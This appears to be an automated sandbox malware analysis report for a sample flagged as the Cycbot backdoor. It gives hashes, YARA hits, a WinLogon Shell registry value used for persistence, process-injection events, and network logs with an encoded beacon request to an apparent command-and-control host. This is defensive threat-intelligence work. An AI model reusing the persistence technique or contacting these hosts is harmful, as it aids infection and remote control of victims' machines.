Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27/01/2025, 14:06 UTC
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe
Resource
win7-20240903-en
General
-
Target
JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe
-
Size
165KB
-
MD5
4050f3601ab7931a0f6db2262ecb25a9
-
SHA1
aea77ad2a71dea57b06d824ab8617149e2d1edcc
-
SHA256
cd705b00962c246a2513eebce6e3c6b50aed5b3576569006d362a3f16e5b10ea
-
SHA512
1d1ce6495680eb604873297f515f163e9c9145451552158bd897968eab3094e3b8b8ea46e974a15b28b11e9f82a7f64f8569d2c0720d00f30f5a69e140fe2507
-
SSDEEP
3072:hMMbRiYder+FnuJ2PaCZwXPlbPXHVO2oBvQ6xNDCnz1dShLeA184Uum9xVp:hzb0Yd+3Ehih1PoBI6HDw11A184UTxV
Malware Config
Signatures
-
Cycbot family
-
Detects Cycbot payload 7 IoCs
Cycbot is a backdoor and trojan written in C++.
resource yara_rule behavioral2/memory/1644-19-0x0000000000400000-0x0000000000491000-memory.dmp family_cycbot behavioral2/memory/4468-21-0x0000000000400000-0x000000000048E000-memory.dmp family_cycbot behavioral2/memory/4468-22-0x0000000000400000-0x0000000000491000-memory.dmp family_cycbot behavioral2/memory/2224-121-0x0000000000400000-0x0000000000491000-memory.dmp family_cycbot behavioral2/memory/2224-124-0x0000000000400000-0x0000000000491000-memory.dmp family_cycbot behavioral2/memory/4468-125-0x0000000000400000-0x0000000000491000-memory.dmp family_cycbot behavioral2/memory/4468-307-0x0000000000400000-0x0000000000491000-memory.dmp family_cycbot -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\99E4D\\97B0B.exe" JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe -
resource yara_rule behavioral2/memory/4468-4-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/1644-17-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/1644-16-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/1644-19-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/4468-21-0x0000000000400000-0x000000000048E000-memory.dmp upx behavioral2/memory/4468-22-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/2224-121-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/2224-124-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/4468-125-0x0000000000400000-0x0000000000491000-memory.dmp upx behavioral2/memory/4468-307-0x0000000000400000-0x0000000000491000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4468 wrote to memory of 1644 4468 JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe 85 PID 4468 wrote to memory of 1644 4468 JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe 85 PID 4468 wrote to memory of 1644 4468 JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe 85 PID 4468 wrote to memory of 2224 4468 JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe 87 PID 4468 wrote to memory of 2224 4468 JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe 87 PID 4468 wrote to memory of 2224 4468 JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe"1⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exeC:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe startC:\Program Files (x86)\LP\0B09\619.exe%C:\Program Files (x86)\LP\0B092⤵
- System Location Discovery: System Language Discovery
PID:1644
-
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exeC:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe startC:\Program Files (x86)\4DB0B\lvvm.exe%C:\Program Files (x86)\4DB0B2⤵
- System Location Discovery: System Language Discovery
PID:2224
-
Network
-
Remote address:8.8.8.8:53Request13.86.106.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request5.114.82.104.in-addr.arpaIN PTRResponse5.114.82.104.in-addr.arpaIN PTRa104-82-114-5deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestcdn.adventofdeception.comIN AResponsecdn.adventofdeception.comIN A199.59.243.228
-
Remote address:8.8.8.8:53Requestcdn.adventofdeception.comIN A
-
GEThttp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png?sv=836&tq=gwY92w4AC8zK9vspFnOiAGI346Z8AYTMbve6ZWBKDIdi5y67aJGckhbJc8B4xg0EcsnlKrIg9qG7wHR06Lhy0558entp%2FNiYMcVgLReK4J2%2BoX48sUkN42p4Fkk4zJkuzowUkvLy8O2UqJ375MZT4A0lYbuOV8CwZ3AndtV%2BRhNj%2BGWZpdHt79grgzURtNEEFyOC91GY%2BpDVr2e%2BEs2DLY4ylVdrClzUAAhONslnMOhR7AWTSJaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exeRemote address:199.59.243.228:80RequestGET /wp-content/uploads/2011/06/frame7.png?sv=836&tq=gwY92w4AC8zK9vspFnOiAGI346Z8AYTMbve6ZWBKDIdi5y67aJGckhbJc8B4xg0EcsnlKrIg9qG7wHR06Lhy0558entp%2FNiYMcVgLReK4J2%2BoX48sUkN42p4Fkk4zJkuzowUkvLy8O2UqJ375MZT4A0lYbuOV8CwZ3AndtV%2BRhNj%2BGWZpdHt79grgzURtNEEFyOC91GY%2BpDVr2e%2BEs2DLY4ylVdrClzUAAhONslnMOhR7AWTS HTTP/1.0
Connection: close
Host: cdn.adventofdeception.com
Accept: */*
User-Agent: chrome/9.0
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1846
x-request-id: ebf9f105-494b-4893-a1f3-7db484ddee35
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YWpjTSAAeoqL69UUoZXB34tec2j79fzTVH/IEQ2dS2liae+pMC/nT194c2DggZH1Gchk30FA8c7q4p1r3+VLgg==
set-cookie: parking_session=ebf9f105-494b-4893-a1f3-7db484ddee35; expires=Tue, 28 Jan 2025 03:44:35 GMT; path=/
connection: close
-
Remote address:8.8.8.8:53Request228.243.59.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttulfb-uqu4.kupinosis.comIN AResponse
-
Remote address:8.8.8.8:53Requestm4cid.enotusfed.comIN AResponse
-
Remote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request197.87.175.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request26duwoge.enotusfed.comIN AResponse
-
Remote address:8.8.8.8:53Request70.252.19.2.in-addr.arpaIN PTRResponse70.252.19.2.in-addr.arpaIN PTRa2-19-252-70deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.179.100
-
Remote address:142.250.179.100:80RequestGET / HTTP/1.0
Connection: close
Host: www.google.com
Accept: */*
ResponseHTTP/1.0 302 Found
x-hallmonitor-challenge: CgsI257hvAYQhczZCBIEtdewUw
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Lal2yo3GNGejTsEapyMaBA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Tue, 28 Jan 2025 03:30:35 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-Xhud_y5rSZvutenCr1SY4OsPM2zMKv6i-XykBz8giAVxYYNZsbzA; expires=Sun, 27-Jul-2025 03:30:35 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
-
Remote address:142.250.179.100:80RequestGET / HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 302 Found
x-hallmonitor-challenge: CgwI257hvAYQ9-KXyQESBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-O0UhZ4_-IhUpBcmJ1UsgDg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Tue, 28 Jan 2025 03:30:35 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-VOcp4kKll_criLPKb5xBmHANztG7k7fzLisNnJP_ixsGfgsysJl74; expires=Sun, 27-Jul-2025 03:30:35 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Connection: close
-
GEThttp://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGNue4bwGIjB8v_vHyGWPf7zfOXQ588wtkyHgLKBTIpa6hrmPWLhbirCqquBEjHUqLePof8gSk-EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMJaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exeRemote address:142.250.179.100:80RequestGET /sorry/index?continue=http://www.google.com/&q=EgS117BTGNue4bwGIjB8v_vHyGWPf7zfOXQ588wtkyHgLKBTIpa6hrmPWLhbirCqquBEjHUqLePof8gSk-EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 429 Too Many Requests
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3086
X-XSS-Protection: 0
Connection: close
-
Remote address:8.8.8.8:53Request100.179.250.142.in-addr.arpaIN PTRResponse100.179.250.142.in-addr.arpaIN PTRpar21s20-in-f41e100net
-
Remote address:8.8.8.8:53Request19.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request170.253.116.51.in-addr.arpaIN PTRResponse
-
199.59.243.228:80http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png?sv=836&tq=gwY92w4AC8zK9vspFnOiAGI346Z8AYTMbve6ZWBKDIdi5y67aJGckhbJc8B4xg0EcsnlKrIg9qG7wHR06Lhy0558entp%2FNiYMcVgLReK4J2%2BoX48sUkN42p4Fkk4zJkuzowUkvLy8O2UqJ375MZT4A0lYbuOV8CwZ3AndtV%2BRhNj%2BGWZpdHt79grgzURtNEEFyOC91GY%2BpDVr2e%2BEs2DLY4ylVdrClzUAAhONslnMOhR7AWTShttpJaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe730 B 2.8kB 7 7
HTTP Request
GET http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png?sv=836&tq=gwY92w4AC8zK9vspFnOiAGI346Z8AYTMbve6ZWBKDIdi5y67aJGckhbJc8B4xg0EcsnlKrIg9qG7wHR06Lhy0558entp%2FNiYMcVgLReK4J2%2BoX48sUkN42p4Fkk4zJkuzowUkvLy8O2UqJ375MZT4A0lYbuOV8CwZ3AndtV%2BRhNj%2BGWZpdHt79grgzURtNEEFyOC91GY%2BpDVr2e%2BEs2DLY4ylVdrClzUAAhONslnMOhR7AWTSHTTP Response
200 -
-
302 B 1.5kB 5 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
307 B 1.5kB 5 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
142.250.179.100:80http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGNue4bwGIjB8v_vHyGWPf7zfOXQ588wtkyHgLKBTIpa6hrmPWLhbirCqquBEjHUqLePof8gSk-EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMhttpJaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe526 B 3.7kB 6 7
HTTP Request
GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGNue4bwGIjB8v_vHyGWPf7zfOXQ588wtkyHgLKBTIpa6hrmPWLhbirCqquBEjHUqLePof8gSk-EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Response
429 -
-
-
-
-
71 B 157 B 1 1
DNS Request
13.86.106.20.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
5.114.82.104.in-addr.arpa
-
142 B 87 B 2 1
DNS Request
cdn.adventofdeception.com
DNS Request
cdn.adventofdeception.com
DNS Response
199.59.243.228
-
168 B 3
-
73 B 131 B 1 1
DNS Request
228.243.59.199.in-addr.arpa
-
70 B 143 B 1 1
DNS Request
tulfb-uqu4.kupinosis.com
-
65 B 138 B 1 1
DNS Request
m4cid.enotusfed.com
-
72 B 158 B 1 1
DNS Request
232.168.11.51.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
197.87.175.4.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
68 B 141 B 1 1
DNS Request
26duwoge.enotusfed.com
-
70 B 133 B 1 1
DNS Request
70.252.19.2.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.179.100
-
74 B 112 B 1 1
DNS Request
100.179.250.142.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
19.229.111.52.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
170.253.116.51.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
996B
MD52674d1714a952a910bdcda1a3aec0e8b
SHA16d2f7b01aaf72b65cbd81e70bf09c2e65ee88af3
SHA256ecb54c8b06958c9134d35fd89b82f112bd1bc5a1683c267cc296877da7f6afe9
SHA512669751e93700740bfb14f6686f02521196e68c1677df2e659fda8b2f1c0bab843509a6ed533c93ec666d5e99ab01726086907d4156865db4fc408bc70a6eb868
-
Filesize
600B
MD5129bcfedcb2c684691f97574d0544335
SHA1bc93427ae5f85b4b5f75cd617ccc427a9db64abe
SHA256e5046c029873478748a69efcfef06e4a391c66a3206717c4911780028d93a304
SHA512039079080463846fcb08f1681e9c527c0e338d6d312dfa0b907ce40414802c855bedbd657f8e6e1f3174a3e5a3d3aeece81eb535496c7c75e317296480499186
-
Filesize
1KB
MD5f294e79f1544ac1efaa68fe00cbbecb4
SHA15fc41f4a7835321399da90075f51378a35b2e478
SHA2569414793d74da7d4a2951f0691ea7a29dd398102c97672121f6dee03e6fedacf4
SHA512ad89c744e2d9112fb7aa649de6697bdc072d8b1706755e6773de2b06620266eaa910ce7072c65e1fa8f3b09ae1a8b09439e80a8bd7fecaa28d83e89432696e74